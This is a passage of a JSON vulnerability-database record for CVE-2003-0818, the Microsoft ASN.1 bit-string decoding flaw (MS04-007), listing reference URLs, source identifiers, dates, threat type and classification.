        "url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html"
      },
      {
        "trust": 0.9,
        "url": "http://www.securityfocus.com/bid/13300"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp"
      },
      {
        "trust": 0.9,
        "url": "/archive/1/354227"
      },
      {
        "trust": 0.8,
        "url": "http://www.eeye.com/html/research/advisories/ad20040210.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ciac.org/ciac/bulletins/o-065.shtml"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818"
      },
      {
        "trust": 0.8,
        "url": "http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/15039"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/wr/2004/wr040701.txt"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/at/2004/at040001.txt"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta04-041a/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta04-041a/"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/9635"
      },
      {
        "trust": 0.8,
        "url": "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf"
      },
      {
        "trust": 0.8,
        "url": "http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.cyberpolice.go.jp/important/20040211_084159.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/"
      },
      {
        "trust": 0.3,
        "url": "http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/353320"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/153/"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill"
      },
      {
        "trust": 0.1,
        "url": "http://metasploit.com/framework/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2003-0818"
      },
      {
        "trust": 0.1,
        "url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/583108\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://microsoft.com/technet/security/bulletin/ms04-007.asp\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://support.microsoft.com/default.aspx?scid=252648\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/216324\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.eeye.com/html/research/advisories/ad20040210.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html\u003e"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-02-10T00:00:00",
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "date": "2004-02-10T00:00:00",
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "date": "2004-03-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "date": "2005-04-21T00:00:00",
        "db": "BID",
        "id": "13300"
      },
      {
        "date": "2004-02-10T00:00:00",
        "db": "BID",
        "id": "9633"
      },
      {
        "date": "2004-02-10T00:00:00",
        "db": "BID",
        "id": "9635"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "date": "2009-11-26T00:34:53",
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "date": "2004-02-11T02:24:00",
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "date": "2003-11-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "date": "2004-03-03T05:00:00",
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-02-10T00:00:00",
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "date": "2004-02-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "date": "2019-04-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "date": "2009-07-12T14:06:00",
        "db": "BID",
        "id": "13300"
      },
      {
        "date": "2009-07-12T02:06:00",
        "db": "BID",
        "id": "9633"
      },
      {
        "date": "2009-07-12T02:06:00",
        "db": "BID",
        "id": "9635"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "date": "2019-05-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "date": "2019-04-30T14:27:13.710000",
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft ASN.1 Library improperly decodes constructed bit strings",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Boundary Condition Error",
    "sources": [
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      }
    ],
    "trust": 0.9
  }
}